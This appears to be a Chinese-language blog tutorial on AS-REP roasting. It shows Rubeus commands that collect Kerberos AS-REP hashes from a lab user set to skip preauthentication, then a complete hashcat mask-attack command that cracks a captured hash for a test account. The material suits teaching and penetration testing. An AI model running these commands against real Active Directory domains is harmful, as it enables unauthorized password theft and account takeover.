As-repoasting爆破

這個功能會通過LDAP查詢域內用戶設置了選項”Do not require Kerberos preauthentication”,然後發AS_REQ的包,直接生成hash或者john可破解的格式


我們先設置一個用戶不需要預驗證
在這裏插入圖片描述
然後直接使用Rubeus來尋找可以利用的用戶~~
執行的命令爲:

Rubeus.exe asreproast

在這裏插入圖片描述這樣我們直接用hashcat爆破密碼就行了
這兒默認返回的是hash格式的,若想要返回john格式的
執行命令

Rubeus.exe asreproast /format:john

我這兒用hashcat的掩碼模式來爆破

hashcat64.exe -a 3 -m 18200 $krb5asrep$23$test1@test.com:01EF9F8A158B0639063FFB1CAD887C4F$BAE81E3FB47820582AF6ECB854C69539FF6FCEBBBC37ED7952FFAD752A8D23E457BD44BF9F12AA447DF9C16D820C96372D51982C8FA7B4113EAA3F462877E2E04A9F13F5CC1F0FF05CF6455927B3587CC10E4BC56608E9A0CF08E4F13537520A4EDEAF4F03F3B9E9451D368DB7219B29D23F440C4D1E4816C983AED9AA35B068B049216A50B0267A3EA69DD97C70712CF3C4A375D55E7C9AEB693DA167C7BA93F86849323B542E43558F4C8F64A64D85B54C4A87A7360FDC65EA5EE443AFDBF7F86F604FBD2B0A8523E92F6C830B1B56F7FB1EBFA3D07CD89E5F68D20FF69E80022E2757 -1 qwe!@#123456789 --increment --increment-min 9 --increment-max 9 ?1?1?1?1?1?1?1?1?1

在這裏插入圖片描述更多hashcat -m請參考鏈接

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章